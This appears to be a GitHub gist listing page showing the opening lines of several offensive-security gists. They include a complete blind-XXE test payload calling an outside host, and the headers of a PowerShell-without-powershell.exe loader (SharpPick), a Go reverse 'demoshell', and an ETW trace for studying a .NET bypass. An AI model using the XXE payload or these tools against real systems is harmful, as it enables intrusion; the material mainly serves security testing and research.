This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Ensure System.Security assembly is loaded. | |
Add-Type -AssemblyName System.Security | |
function ConvertTo-CIPolicy { | |
<# | |
.SYNOPSIS | |
Converts a binary file that contains a Code Integrity policy into XML format. | |
Author: Matthew Graeber (@mattifestation) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from argparse import ArgumentParser | |
from subprocess import Popen, PIPE | |
from hashlib import sha1 | |
from os import path, walk | |
import re | |
import os | |
from sys import stderr | |
def extension_dir(): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* SharpPick aka InexorablePoSH | |
* Description: Application to load and run powershell code via the .NET assemblies | |
* License: 3-Clause BSD License. See Veil PowerTools Project | |
* | |
* This application is part of Veil PowerTools, a collection of offensive PowerShell | |
* capabilities. Hope they help! | |
* | |
* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* SharpPick aka InexorablePoSH | |
* Description: Application to load and run powershell code via the .NET assemblies | |
* License: 3-Clause BSD License. See Veil PowerTools Project | |
* | |
* This application is part of Veil PowerTools, a collection of offensive PowerShell | |
* capabilities. Hope they help! | |
* | |
* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
The purpose of this script is to attempt to set off alarms on security products. | |
#> | |
function Get-RandomString { | |
# Get-RandomString.ps1 | |
# Written by Bill Stewart (bstewart@iname.com) | |
#requires -version 2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// demoshell is a nifty beaconing shell useful for demos | |
package main | |
/* | |
* demoshell.go | |
* Simple reverse shell used in demos | |
* By J. Stuart McMurray | |
* Created 20180331 | |
* Last Modified 20180331 | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets | |
# Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass | |
# logman stop dotNetTrace -ets | |
# This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe | |
# I got the process ID by running a procmon trace | |
$TargetProcessId = 8256 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"bytes" | |
"fmt" | |
"os/exec" | |
"strings" | |
) | |
// PowerShell struct |
OlderNewer